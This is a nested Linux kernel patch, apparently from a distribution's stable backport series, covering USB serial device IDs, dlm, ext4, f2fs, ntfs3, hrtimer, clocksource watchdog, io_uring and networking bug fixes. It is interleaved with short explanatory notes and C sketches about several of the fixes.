+ 			xhci->quirks |= XHCI_BROKEN_PORT_PED;
+ 
++		if (device_property_read_bool(tmpdev, "xhci-sg-trb-cache-size-quirk"))
++			xhci->quirks |= XHCI_SG_TRB_CACHE_SIZE_QUIRK;
++
+ 		device_property_read_u32(tmpdev, "imod-interval-ns",
+ 					 &xhci->imod_interval);
+ 	}
+diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
+index f1d7a5a863aa4..b3e60b3847941 100644
+--- a/drivers/usb/serial/cp210x.c
++++ b/drivers/usb/serial/cp210x.c
+@@ -146,6 +146,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(0x10C4, 0x85F8) }, /* Virtenio Preon32 */
+ 	{ USB_DEVICE(0x10C4, 0x8664) }, /* AC-Services CAN-IF */
+ 	{ USB_DEVICE(0x10C4, 0x8665) }, /* AC-Services OBD-IF */
++	{ USB_DEVICE(0x10C4, 0x87ED) }, /* IMST USB-Stick for Smart Meter */
+ 	{ USB_DEVICE(0x10C4, 0x8856) },	/* CEL EM357 ZigBee USB Stick - LR */
+ 	{ USB_DEVICE(0x10C4, 0x8857) },	/* CEL EM357 ZigBee USB Stick */
+ 	{ USB_DEVICE(0x10C4, 0x88A4) }, /* MMB Networks ZigBee USB Device */
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index 4adef92598709..c0a0cca65437f 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -2269,6 +2269,7 @@ static const struct usb_device_id option_ids[] = {
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x0111, 0xff) },			/* Fibocom FM160 (MBIM mode) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a0, 0xff) },			/* Fibocom NL668-AM/NL652-EU (laptop MBIM) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a2, 0xff) },			/* Fibocom FM101-GL (laptop MBIM) */
++	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a3, 0xff) },			/* Fibocom FM101-GL (laptop MBIM) */
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2cb7, 0x01a4, 0xff),			/* Fibocom FM101-GL (laptop MBIM) */
+ 	  .driver_info = RSVD(4) },
+ 	{ USB_DEVICE_INTERFACE_CLASS(0x2df3, 0x9d03, 0xff) },			/* LongSung M5710 */
+diff --git a/drivers/usb/serial/qcserial.c b/drivers/usb/serial/qcserial.c
+index b1e844bf31f81..703a9c5635573 100644
+--- a/drivers/usb/serial/qcserial.c
++++ b/drivers/usb/serial/qcserial.c
+@@ -184,6 +184,8 @@ static const struct usb_device_id id_table[] = {
+ 	{DEVICE_SWI(0x413c, 0x81d0)},   /* Dell Wireless 5819 */
+ 	{DEVICE_SWI(0x413c, 0x81d1)},   /* Dell Wireless 5818 */
+ 	{DEVICE_SWI(0x413c, 0x81d2)},   /* Dell Wireless 5818 */
++	{DEVICE_SWI(0x413c, 0x8217)},	/* Dell Wireless DW5826e */
++	{DEVICE_SWI(0x413c, 0x8218)},	/* Dell Wireless DW5826e QDL */
+ 
+ 	/* Huawei devices */
+ 	{DEVICE_HWI(0x03f0, 0x581d)},	/* HP lt4112 LTE/HSPA+ Gobi 4G Modem (Huawei me906e) */
+diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
+index 2eea080298812..61c72e62abd49 100644
+--- a/drivers/vhost/vhost.c
++++ b/drivers/vhost/vhost.c
+@@ -2588,12 +2588,11 @@ EXPORT_SYMBOL_GPL(vhost_disable_notify);
+ /* Create a new message. */
+ struct vhost_msg_node *vhost_new_msg(struct vhost_virtqueue *vq, int type)
+ {
+-	struct vhost_msg_node *node = kmalloc(sizeof *node, GFP_KERNEL);
++	/* Make sure all padding within the structure is initialized. */
++	struct vhost_msg_node *node = kzalloc(sizeof(*node), GFP_KERNEL);
+ 	if (!node)
+ 		return NULL;
+ 
+-	/* Make sure all padding within the structure is initialized. */
+-	memset(&node->msg, 0, sizeof node->msg);
+ 	node->vq = vq;
+ 	node->msg.type = type;
+ 	return node;
+diff --git a/fs/dlm/lowcomms.c b/fs/dlm/lowcomms.c
+index 72f34f96d0155..2c797eb519da9 100644
+--- a/fs/dlm/lowcomms.c
++++ b/fs/dlm/lowcomms.c
+@@ -174,7 +174,7 @@ static LIST_HEAD(dlm_node_addrs);
+ static DEFINE_SPINLOCK(dlm_node_addrs_spin);
+ 
+ static struct listen_connection listen_con;
+-static struct sockaddr_storage *dlm_local_addr[DLM_MAX_ADDR_COUNT];
++static struct sockaddr_storage dlm_local_addr[DLM_MAX_ADDR_COUNT];
+ static int dlm_local_count;
+ int dlm_allow_conn;
+ 
+@@ -398,7 +398,7 @@ static int nodeid_to_addr(int nodeid, struct sockaddr_storage *sas_out,
+ 	if (!sa_out)
+ 		return 0;
+ 
+-	if (dlm_local_addr[0]->ss_family == AF_INET) {
++	if (dlm_local_addr[0].ss_family == AF_INET) {
+ 		struct sockaddr_in *in4  = (struct sockaddr_in *) &sas;
+ 		struct sockaddr_in *ret4 = (struct sockaddr_in *) sa_out;
+ 		ret4->sin_addr.s_addr = in4->sin_addr.s_addr;
+@@ -727,7 +727,7 @@ static void add_sock(struct socket *sock, struct connection *con)
+ static void make_sockaddr(struct sockaddr_storage *saddr, uint16_t port,
+ 			  int *addr_len)
+ {
+-	saddr->ss_family =  dlm_local_addr[0]->ss_family;
++	saddr->ss_family =  dlm_local_addr[0].ss_family;
+ 	if (saddr->ss_family == AF_INET) {
+ 		struct sockaddr_in *in4_addr = (struct sockaddr_in *)saddr;
+ 		in4_addr->sin_port = cpu_to_be16(port);
+@@ -1167,7 +1167,7 @@ static int sctp_bind_addrs(struct socket *sock, uint16_t port)
+ 	int i, addr_len, result = 0;
+ 
+ 	for (i = 0; i < dlm_local_count; i++) {
+-		memcpy(&localaddr, dlm_local_addr[i], sizeof(localaddr));
++		memcpy(&localaddr, &dlm_local_addr[i], sizeof(localaddr));
+ 		make_sockaddr(&localaddr, port, &addr_len);
+ 
+ 		if (!i)
+@@ -1187,7 +1187,7 @@ static int sctp_bind_addrs(struct socket *sock, uint16_t port)
+ /* Get local addresses */
+ static void init_local(void)
+ {
+-	struct sockaddr_storage sas, *addr;
++	struct sockaddr_storage sas;
+ 	int i;
+ 
+ 	dlm_local_count = 0;
+@@ -1195,21 +1195,10 @@ static void init_local(void)
+ 		if (dlm_our_addr(&sas, i))
+ 			break;
+ 
+-		addr = kmemdup(&sas, sizeof(*addr), GFP_NOFS);
+-		if (!addr)
+-			break;
+-		dlm_local_addr[dlm_local_count++] = addr;
++		memcpy(&dlm_local_addr[dlm_local_count++], &sas, sizeof(sas));
+ 	}
+ }
+ 
+-static void deinit_local(void)
+-{
+-	int i;
+-
+-	for (i = 0; i < dlm_local_count; i++)
+-		kfree(dlm_local_addr[i]);
+-}
+-
+ static struct writequeue_entry *new_writequeue_entry(struct connection *con)
+ {
+ 	struct writequeue_entry *entry;
+@@ -1575,7 +1564,7 @@ static void dlm_connect(struct connection *con)
+ 	}
+ 
+ 	/* Create a socket to communicate with */
+-	result = sock_create_kern(&init_net, dlm_local_addr[0]->ss_family,
++	result = sock_create_kern(&init_net, dlm_local_addr[0].ss_family,
+ 				  SOCK_STREAM, dlm_proto_ops->proto, &sock);
+ 	if (result < 0)
+ 		goto socket_err;
+@@ -1786,7 +1775,6 @@ void dlm_lowcomms_stop(void)
+ 	foreach_conn(free_conn);
+ 	srcu_read_unlock(&connections_srcu, idx);
+ 	work_stop();
+-	deinit_local();
+ 
+ 	dlm_proto_ops = NULL;
+ }
+@@ -1803,7 +1791,7 @@ static int dlm_listen_for_all(void)
+ 	if (result < 0)
+ 		return result;
+ 
+-	result = sock_create_kern(&init_net, dlm_local_addr[0]->ss_family,
++	result = sock_create_kern(&init_net, dlm_local_addr[0].ss_family,
+ 				  SOCK_STREAM, dlm_proto_ops->proto, &sock);
+ 	if (result < 0) {
+ 		log_print("Can't create comms socket: %d", result);
+@@ -1842,7 +1830,7 @@ static int dlm_tcp_bind(struct socket *sock)
+ 	/* Bind to our cluster-known address connecting to avoid
+ 	 * routing problems.
+ 	 */
+-	memcpy(&src_addr, dlm_local_addr[0], sizeof(src_addr));
++	memcpy(&src_addr, &dlm_local_addr[0], sizeof(src_addr));
+ 	make_sockaddr(&src_addr, 0, &addr_len);
+ 
+ 	result = kernel_bind(sock, (struct sockaddr *)&src_addr,
+@@ -1899,9 +1887,9 @@ static int dlm_tcp_listen_bind(struct socket *sock)
+ 	int addr_len;
+ 
+ 	/* Bind to our port */
+-	make_sockaddr(dlm_local_addr[0], dlm_config.ci_tcp_port, &addr_len);
++	make_sockaddr(&dlm_local_addr[0], dlm_config.ci_tcp_port, &addr_len);
+ 	return kernel_bind(sock, (struct sockaddr *)&dlm_local_addr[0],
+-			   addr_len);
++		           addr_len);
+ }
+ 
+ static const struct dlm_proto_ops dlm_tcp_ops = {
+@@ -1992,7 +1980,7 @@ int dlm_lowcomms_start(void)
+ 
+ 	error = work_start();
+ 	if (error)
+-		goto fail_local;
++		goto fail;
+ 
+ 	dlm_allow_conn = 1;
+ 
+@@ -2022,8 +2010,6 @@ fail_listen:
+ fail_proto_ops:
+ 	dlm_allow_conn = 0;
+ 	work_stop();
+-fail_local:
+-	deinit_local();
+ fail:
+ 	return error;
+ }
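
The dlm change above turns dlm_local_addr from an array of kmemdup()'d pointers into an array of embedded structs, which removes both a per-address allocation that could fail and the matching deinit_local() free loop (hence the dropped fail_local label). A rough sketch of the before/after shape, with made-up names:

#include <string.h>

#define MAX_ADDRS 16

struct addr { unsigned char bytes[128]; };

/* Before: struct addr *local_addrs[MAX_ADDRS], each slot duplicated on
 * the heap and freed on teardown. After: storage by value. */
static struct addr local_addrs[MAX_ADDRS];
static int local_count;

static void add_local_addr(const struct addr *a)
{
	/* A plain copy cannot fail, so the error path disappears too. */
	memcpy(&local_addrs[local_count++], a, sizeof(*a));
}
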
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index c1515daf1def1..40903c172a34f 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -1118,6 +1118,24 @@ void ext4_mb_generate_buddy(struct super_block *sb,
+ 	atomic64_add(period, &sbi->s_mb_generation_time);
+ }
+ 
++static void mb_regenerate_buddy(struct ext4_buddy *e4b)
++{
++	int count;
++	int order = 1;
++	void *buddy;
++
++	while ((buddy = mb_find_buddy(e4b, order++, &count)))
++		mb_set_bits(buddy, 0, count);
++
++	e4b->bd_info->bb_fragments = 0;
++	memset(e4b->bd_info->bb_counters, 0,
++		sizeof(*e4b->bd_info->bb_counters) *
++		(e4b->bd_sb->s_blocksize_bits + 2));
++
++	ext4_mb_generate_buddy(e4b->bd_sb, e4b->bd_buddy,
++		e4b->bd_bitmap, e4b->bd_group, e4b->bd_info);
++}
++
+ /* The buddy information is attached the buddy cache inode
+  * for convenience. The information regarding each group
+  * is loaded via ext4_mb_load_buddy. The information involve
+@@ -1796,6 +1814,8 @@ static void mb_free_blocks(struct inode *inode, struct ext4_buddy *e4b,
+ 			ext4_mark_group_bitmap_corrupted(
+ 				sb, e4b->bd_group,
+ 				EXT4_GROUP_INFO_BBITMAP_CORRUPT);
++		} else {
++			mb_regenerate_buddy(e4b);
+ 		}
+ 		goto done;
+ 	}
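
mb_regenerate_buddy() above rebuilds the in-memory buddy bitmap and its counters from the authoritative block bitmap once mb_free_blocks() trips its consistency check, rather than leaving stale derived state behind. A toy illustration of that regenerate-derived-state idea, simplified far below the real buddy orders:

#include <stdint.h>
#include <string.h>

#define GROUP_BITS 64

struct group_info {
	int free_total;
	int fragments;   /* runs of consecutive free blocks */
};

/* Recompute the counters by scanning the bitmap (bit set = in use),
 * discarding whatever stale values were there before. */
static void regenerate(uint64_t bitmap, struct group_info *gi)
{
	int in_run = 0;

	memset(gi, 0, sizeof(*gi));
	for (int i = 0; i < GROUP_BITS; i++) {
		int is_free = !((bitmap >> i) & 1);

		gi->free_total += is_free;
		if (is_free && !in_run)
			gi->fragments++;
		in_run = is_free;
	}
}
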
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index 3d9f6495a4db4..967262c37da52 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -55,6 +55,7 @@ struct f2fs_compress_ops {
+ 	int (*init_decompress_ctx)(struct decompress_io_ctx *dic);
+ 	void (*destroy_decompress_ctx)(struct decompress_io_ctx *dic);
+ 	int (*decompress_pages)(struct decompress_io_ctx *dic);
++	bool (*is_level_valid)(int level);
+ };
+ 
+ static unsigned int offset_in_cluster(struct compress_ctx *cc, pgoff_t index)
+@@ -322,11 +323,21 @@ static int lz4_decompress_pages(struct decompress_io_ctx *dic)
+ 	return 0;
+ }
+ 
++static bool lz4_is_level_valid(int lvl)
++{
++#ifdef CONFIG_F2FS_FS_LZ4HC
++	return !lvl || (lvl >= LZ4HC_MIN_CLEVEL && lvl <= LZ4HC_MAX_CLEVEL);
++#else
++	return lvl == 0;
++#endif
++}
++
+ static const struct f2fs_compress_ops f2fs_lz4_ops = {
+ 	.init_compress_ctx	= lz4_init_compress_ctx,
+ 	.destroy_compress_ctx	= lz4_destroy_compress_ctx,
+ 	.compress_pages		= lz4_compress_pages,
+ 	.decompress_pages	= lz4_decompress_pages,
++	.is_level_valid		= lz4_is_level_valid,
+ };
+ #endif
+ 
+@@ -490,6 +501,11 @@ static int zstd_decompress_pages(struct decompress_io_ctx *dic)
+ 	return 0;
+ }
+ 
++static bool zstd_is_level_valid(int lvl)
++{
++	return lvl >= zstd_min_clevel() && lvl <= zstd_max_clevel();
++}
++
+ static const struct f2fs_compress_ops f2fs_zstd_ops = {
+ 	.init_compress_ctx	= zstd_init_compress_ctx,
+ 	.destroy_compress_ctx	= zstd_destroy_compress_ctx,
+@@ -497,6 +513,7 @@ static const struct f2fs_compress_ops f2fs_zstd_ops = {
+ 	.init_decompress_ctx	= zstd_init_decompress_ctx,
+ 	.destroy_decompress_ctx	= zstd_destroy_decompress_ctx,
+ 	.decompress_pages	= zstd_decompress_pages,
++	.is_level_valid		= zstd_is_level_valid,
+ };
+ #endif
+ 
+@@ -555,6 +572,16 @@ bool f2fs_is_compress_backend_ready(struct inode *inode)
+ 	return f2fs_cops[F2FS_I(inode)->i_compress_algorithm];
+ }
+ 
++bool f2fs_is_compress_level_valid(int alg, int lvl)
++{
++	const struct f2fs_compress_ops *cops = f2fs_cops[alg];
++
++	if (cops->is_level_valid)
++		return cops->is_level_valid(lvl);
++
++	return lvl == 0;
++}
++
+ static mempool_t *compress_page_pool;
+ static int num_compress_pages = 512;
+ module_param(num_compress_pages, uint, 0444);
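
f2fs_is_compress_level_valid() above routes level checking through a new optional .is_level_valid callback in the per-algorithm ops table, defaulting to "only level 0" when an algorithm does not provide one; the super.c hunks that follow then call it in place of the open-coded LZ4HC/zstd range checks. A compact sketch of that optional-callback dispatch (the bounds and names below are placeholders, not f2fs's):

#include <stdbool.h>
#include <stddef.h>

struct compress_ops {
	bool (*is_level_valid)(int level);   /* optional */
};

static bool zstd_level_ok(int level)
{
	return level >= 1 && level <= 22;    /* placeholder bounds */
}

static const struct compress_ops ops_lzo  = { .is_level_valid = NULL };
static const struct compress_ops ops_zstd = { .is_level_valid = zstd_level_ok };

static bool level_valid(const struct compress_ops *ops, int level)
{
	if (ops->is_level_valid)
		return ops->is_level_valid(level);
	return level == 0;   /* algorithms without levels accept only 0 */
}

/* e.g. level_valid(&ops_lzo, 0) and level_valid(&ops_zstd, 3) are true */
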
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 5c76ba764b71f..e5a9498b89c06 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -4219,6 +4219,7 @@ bool f2fs_compress_write_end(struct inode *inode, void *fsdata,
+ int f2fs_truncate_partial_cluster(struct inode *inode, u64 from, bool lock);
+ void f2fs_compress_write_end_io(struct bio *bio, struct page *page);
+ bool f2fs_is_compress_backend_ready(struct inode *inode);
++bool f2fs_is_compress_level_valid(int alg, int lvl);
+ int f2fs_init_compress_mempool(void);
+ void f2fs_destroy_compress_mempool(void);
+ void f2fs_decompress_cluster(struct decompress_io_ctx *dic, bool in_task);
+@@ -4283,6 +4284,7 @@ static inline bool f2fs_is_compress_backend_ready(struct inode *inode)
+ 	/* not support compression */
+ 	return false;
+ }
++static inline bool f2fs_is_compress_level_valid(int alg, int lvl) { return false; }
+ static inline struct page *f2fs_compress_control_page(struct page *page)
+ {
+ 	WARN_ON_ONCE(1);
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 3805162dcef2b..0c0d0671febea 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -628,7 +628,7 @@ static int f2fs_set_lz4hc_level(struct f2fs_sb_info *sbi, const char *str)
+ 	if (kstrtouint(str + 1, 10, &level))
+ 		return -EINVAL;
+ 
+-	if (level < LZ4HC_MIN_CLEVEL || level > LZ4HC_MAX_CLEVEL) {
++	if (!f2fs_is_compress_level_valid(COMPRESS_LZ4, level)) {
+ 		f2fs_info(sbi, "invalid lz4hc compress level: %d", level);
+ 		return -EINVAL;
+ 	}
+@@ -666,7 +666,7 @@ static int f2fs_set_zstd_level(struct f2fs_sb_info *sbi, const char *str)
+ 	if (kstrtouint(str + 1, 10, &level))
+ 		return -EINVAL;
+ 
+-	if (level < zstd_min_clevel() || level > zstd_max_clevel()) {
++	if (!f2fs_is_compress_level_valid(COMPRESS_ZSTD, level)) {
+ 		f2fs_info(sbi, "invalid zstd compress level: %d", level);
+ 		return -EINVAL;
+ 	}
+diff --git a/fs/ntfs3/ntfs_fs.h b/fs/ntfs3/ntfs_fs.h
+index 8c9abaf139e67..74482ef569ab7 100644
+--- a/fs/ntfs3/ntfs_fs.h
++++ b/fs/ntfs3/ntfs_fs.h
+@@ -467,7 +467,7 @@ bool al_delete_le(struct ntfs_inode *ni, enum ATTR_TYPE type, CLST vcn,
+ int al_update(struct ntfs_inode *ni, int sync);
+ static inline size_t al_aligned(size_t size)
+ {
+-	return (size + 1023) & ~(size_t)1023;
++	return size_add(size, 1023) & ~(size_t)1023;
+ }
+ 
+ /* Globals from bitfunc.c */
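
The al_aligned() fix above swaps a plain "size + 1023" for the kernel's saturating size_add(), so a size near SIZE_MAX can no longer wrap around before the round-up and yield an undersized allocation. A userspace sketch of the saturating helper (size_add_sat stands in for the kernel's size_add):

#include <stdint.h>
#include <stddef.h>

static size_t size_add_sat(size_t a, size_t b)
{
	size_t r;

	/* Saturate at SIZE_MAX instead of wrapping around. */
	if (__builtin_add_overflow(a, b, &r))
		return SIZE_MAX;
	return r;
}

static size_t al_aligned(size_t size)
{
	/* A wrapped sum would round down to almost zero; a saturated
	 * one rounds to a huge value the allocator simply refuses. */
	return size_add_sat(size, 1023) & ~(size_t)1023;
}
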
+diff --git a/fs/smb/client/sess.c b/fs/smb/client/sess.c
+index 634035bcb9347..b8e14bcd2c68d 100644
+--- a/fs/smb/client/sess.c
++++ b/fs/smb/client/sess.c
+@@ -248,6 +248,8 @@ int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
+ 					 &iface->sockaddr,
+ 					 rc);
+ 				kref_put(&iface->refcount, release_iface);
++				/* failure to add chan should increase weight */
++				iface->weight_fulfilled++;
+ 				continue;
+ 			}
+ 
+diff --git a/include/linux/dmaengine.h b/include/linux/dmaengine.h
+index c923f4e60f240..3576c6e89fea4 100644
+--- a/include/linux/dmaengine.h
++++ b/include/linux/dmaengine.h
+@@ -954,7 +954,8 @@ static inline int dmaengine_slave_config(struct dma_chan *chan,
+ 
+ static inline bool is_slave_direction(enum dma_transfer_direction direction)
+ {
+-	return (direction == DMA_MEM_TO_DEV) || (direction == DMA_DEV_TO_MEM);
++	return (direction == DMA_MEM_TO_DEV) || (direction == DMA_DEV_TO_MEM) ||
++	       (direction == DMA_DEV_TO_DEV);
+ }
+ 
+ static inline struct dma_async_tx_descriptor *dmaengine_prep_slave_single(
+diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h
+index f2044d5a652b5..254d4a898179c 100644
+--- a/include/linux/hrtimer.h
++++ b/include/linux/hrtimer.h
+@@ -197,6 +197,7 @@ enum  hrtimer_base_type {
+  * @max_hang_time:	Maximum time spent in hrtimer_interrupt
+  * @softirq_expiry_lock: Lock which is taken while softirq based hrtimer are
+  *			 expired
++ * @online:		CPU is online from an hrtimers point of view
+  * @timer_waiters:	A hrtimer_cancel() invocation waits for the timer
+  *			callback to finish.
+  * @expires_next:	absolute time of the next event, is required for remote
+@@ -219,7 +220,8 @@ struct hrtimer_cpu_base {
+ 	unsigned int			hres_active		: 1,
+ 					in_hrtirq		: 1,
+ 					hang_detected		: 1,
+-					softirq_activated       : 1;
++					softirq_activated       : 1,
++					online			: 1;
+ #ifdef CONFIG_HIGH_RES_TIMERS
+ 	unsigned int			nr_events;
+ 	unsigned short			nr_retries;
+diff --git a/include/uapi/linux/netfilter/nf_tables.h b/include/uapi/linux/netfilter/nf_tables.h
+index af8f4c304d272..707af820f1a97 100644
+--- a/include/uapi/linux/netfilter/nf_tables.h
++++ b/include/uapi/linux/netfilter/nf_tables.h
+@@ -266,9 +266,11 @@ enum nft_rule_attributes {
+ /**
+  * enum nft_rule_compat_flags - nf_tables rule compat flags
+  *
++ * @NFT_RULE_COMPAT_F_UNUSED: unused
+  * @NFT_RULE_COMPAT_F_INV: invert the check result
+  */
+ enum nft_rule_compat_flags {
++	NFT_RULE_COMPAT_F_UNUSED = (1 << 0),
+ 	NFT_RULE_COMPAT_F_INV	= (1 << 1),
+ 	NFT_RULE_COMPAT_F_MASK	= NFT_RULE_COMPAT_F_INV,
+ };
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 67f09a40bcb21..618ab186fe036 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -875,6 +875,7 @@ retry_multishot:
+ 		if (!buf)
+ 			return -ENOBUFS;
+ 		sr->buf = buf;
++		sr->len = len;
+ 	}
+ 
+ 	ret = import_single_range(ITER_DEST, sr->buf, len, &iov, &msg.msg_iter);
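
The one-line io_uring fix above restores the invariant that sr->buf and sr->len describe the same buffer: io_buffer_select() updates len for the buffer it hands back, but only the address was being stored, leaving a stale length in place for retries. The paired update in isolation (names are illustrative):

struct io_buf {
	void *addr;
	unsigned int len;
};

static void select_buffer(struct io_buf *sr, void *buf, unsigned int len)
{
	sr->addr = buf;
	sr->len  = len;   /* must travel with the pointer on every retry */
}
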
+diff --git a/kernel/time/clocksource.c b/kernel/time/clocksource.c
+index 1c90e710d537f..cc6db3bce1b2f 100644
+--- a/kernel/time/clocksource.c
++++ b/kernel/time/clocksource.c
+@@ -126,6 +126,7 @@ static DECLARE_WORK(watchdog_work, clocksource_watchdog_work);
+ static DEFINE_SPINLOCK(watchdog_lock);
+ static int watchdog_running;
+ static atomic_t watchdog_reset_pending;
++static int64_t watchdog_max_interval;
+ 
+ static inline void clocksource_watchdog_lock(unsigned long *flags)
+ {
+@@ -144,6 +145,7 @@ static void __clocksource_change_rating(struct clocksource *cs, int rating);
+  * Interval: 0.5sec.
+  */
+ #define WATCHDOG_INTERVAL (HZ >> 1)
++#define WATCHDOG_INTERVAL_MAX_NS ((2 * WATCHDOG_INTERVAL) * (NSEC_PER_SEC / HZ))
+ 
+ static void clocksource_watchdog_work(struct work_struct *work)
+ {
+@@ -396,8 +398,8 @@ static inline void clocksource_reset_watchdog(void)
+ static void clocksource_watchdog(struct timer_list *unused)
+ {
+ 	u64 csnow, wdnow, cslast, wdlast, delta;
++	int64_t wd_nsec, cs_nsec, interval;
+ 	int next_cpu, reset_pending;
+-	int64_t wd_nsec, cs_nsec;
+ 	struct clocksource *cs;
+ 	enum wd_read_status read_ret;
+ 	unsigned long extra_wait = 0;
+@@ -467,6 +469,27 @@ static void clocksource_watchdog(struct timer_list *unused)
+ 		if (atomic_read(&watchdog_reset_pending))
+ 			continue;
+ 
++		/*
++		 * The processing of timer softirqs can get delayed (usually
++		 * on account of ksoftirqd not getting to run in a timely
++		 * manner), which causes the watchdog interval to stretch.
++		 * Skew detection may fail for longer watchdog intervals
++		 * on account of fixed margins being used.
++		 * Some clocksources, e.g. acpi_pm, cannot tolerate
++		 * watchdog intervals longer than a few seconds.
++		 */
++		interval = max(cs_nsec, wd_nsec);
++		if (unlikely(interval > WATCHDOG_INTERVAL_MAX_NS)) {
++			if (system_state > SYSTEM_SCHEDULING &&
++			    interval > 2 * watchdog_max_interval) {
++				watchdog_max_interval = interval;
++				pr_warn("Long readout interval, skipping watchdog check: cs_nsec: %lld wd_nsec: %lld\n",
++					cs_nsec, wd_nsec);
++			}
++			watchdog_timer.expires = jiffies;
++			continue;
++		}
++
+ 		/* Check the deviation from the watchdog clocksource. */
+ 		md = cs->uncertainty_margin + watchdog->uncertainty_margin;
+ 		if (abs(cs_nsec - wd_nsec) > md) {
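
The watchdog hunk above skips skew checking whenever the measured interval stretches past WATCHDOG_INTERVAL_MAX_NS, since the fixed uncertainty margins only make sense near the nominal 0.5 s period. Working the macro through: with WATCHDOG_INTERVAL = HZ >> 1, the cap is 2 * (HZ/2) * (NSEC_PER_SEC/HZ) = NSEC_PER_SEC, i.e. exactly one second for the common HZ values (100, 250, 1000). A quick standalone check:

#include <assert.h>

#define HZ 250                      /* try 100 or 1000 as well */
#define NSEC_PER_SEC 1000000000LL
#define WATCHDOG_INTERVAL (HZ >> 1)
#define WATCHDOG_INTERVAL_MAX_NS ((2 * WATCHDOG_INTERVAL) * (NSEC_PER_SEC / HZ))

int main(void)
{
	assert(WATCHDOG_INTERVAL_MAX_NS == NSEC_PER_SEC);
	return 0;
}
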
+diff --git a/kernel/time/hrtimer.c b/kernel/time/hrtimer.c
+index 5561dabc9b225..8e0aff1d1ea4f 100644
+--- a/kernel/time/hrtimer.c
++++ b/kernel/time/hrtimer.c
+@@ -1082,6 +1082,7 @@ static int enqueue_hrtimer(struct hrtimer *timer,
+ 			   enum hrtimer_mode mode)
+ {
+ 	debug_activate(timer, mode);
++	WARN_ON_ONCE(!base->cpu_base->online);
+ 
+ 	base->cpu_base->active_bases |= 1 << base->index;
+ 
+@@ -2180,6 +2181,7 @@ int hrtimers_prepare_cpu(unsigned int cpu)
+ 	cpu_base->softirq_next_timer = NULL;
+ 	cpu_base->expires_next = KTIME_MAX;
+ 	cpu_base->softirq_expires_next = KTIME_MAX;
++	cpu_base->online = 1;
+ 	hrtimer_cpu_base_init_expiry_lock(cpu_base);
+ 	return 0;
+ }
+@@ -2247,6 +2249,7 @@ int hrtimers_cpu_dying(unsigned int dying_cpu)
+ 	smp_call_function_single(ncpu, retrigger_next_event, NULL, 0);
+ 
+ 	raw_spin_unlock(&new_base->lock);
++	old_base->online = 0;
+ 	raw_spin_unlock(&old_base->lock);
+ 
+ 	return 0;
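
Taken together, the hrtimer hunks add an online bit to the per-CPU base: set in hrtimers_prepare_cpu(), cleared under the base lock in hrtimers_cpu_dying() once the timers have been migrated away, and checked in enqueue_hrtimer() so a timer armed on a dead CPU's base trips a warning instead of silently never firing. The guard reduced to its essentials, with assert() standing in for WARN_ON_ONCE():

#include <assert.h>
#include <stdbool.h>

struct cpu_base { bool online; };

static void enqueue_timer(struct cpu_base *base)
{
	assert(base->online);   /* timer armed on a dead CPU base */
	/* ... insert into the timer queue ... */
}

static void cpu_dying(struct cpu_base *old_base)
{
	/* migrate all timers to a live CPU first, then: */
	old_base->online = false;   /* late enqueues now trip the assert */
}
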
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 2f646335d2183..9408dc3bb42d3 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -1637,10 +1637,12 @@ EXPORT_SYMBOL(inet_current_timestamp);
+ 
+ int inet_recv_error(struct sock *sk, struct msghdr *msg, int len, int *addr_len)
+ {
+-	if (sk->sk_family == AF_INET)
++	unsigned int family = READ_ONCE(sk->sk_family);
++
++	if (family == AF_INET)
+ 		return ip_recv_error(sk, msg, len, addr_len);
+ #if IS_ENABLED(CONFIG_IPV6)
+-	if (sk->sk_family == AF_INET6)
++	if (family == AF_INET6)
+ 		return pingv6_ops.ipv6_recv_error(sk, msg, len, addr_len);
+ #endif
+ 	return -EINVAL;
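
inet_recv_error() above now snapshots sk->sk_family once with READ_ONCE(), because a concurrent writer (e.g. IPV6_ADDRFORM) can flip the field; reading it twice could see two different values and match neither branch consistently. The same pattern in plain C11, with a relaxed atomic load standing in for READ_ONCE():

#include <stdatomic.h>

#define AF_INET  2
#define AF_INET6 10

struct sock_like { _Atomic int family; };

static int recv_error(struct sock_like *sk)
{
	/* One load, then every decision comes from the snapshot. */
	int family = atomic_load_explicit(&sk->family, memory_order_relaxed);

	if (family == AF_INET)
		return 4;
	if (family == AF_INET6)
		return 6;
	return -1;
}
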
+diff --git a/net/ipv4/ip_tunnel_core.c b/net/ipv4/ip_tunnel_core.c
+index 586b1b3e35b80..80ccd6661aa32 100644
+--- a/net/ipv4/ip_tunnel_core.c
++++ b/net/ipv4/ip_tunnel_core.c
+@@ -332,7 +332,7 @@ static int iptunnel_pmtud_build_icmpv6(struct sk_buff *skb, int mtu)
+ 	};
+ 	skb_reset_network_header(skb);
+ 
+-	csum = csum_partial(icmp6h, len, 0);
++	csum = skb_checksum(skb, skb_transport_offset(skb), len, 0);
+ 	icmp6h->icmp6_cksum = csum_ipv6_magic(&nip6h->saddr, &nip6h->daddr, len,
+ 					      IPPROTO_ICMPV6, csum);
+ 
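
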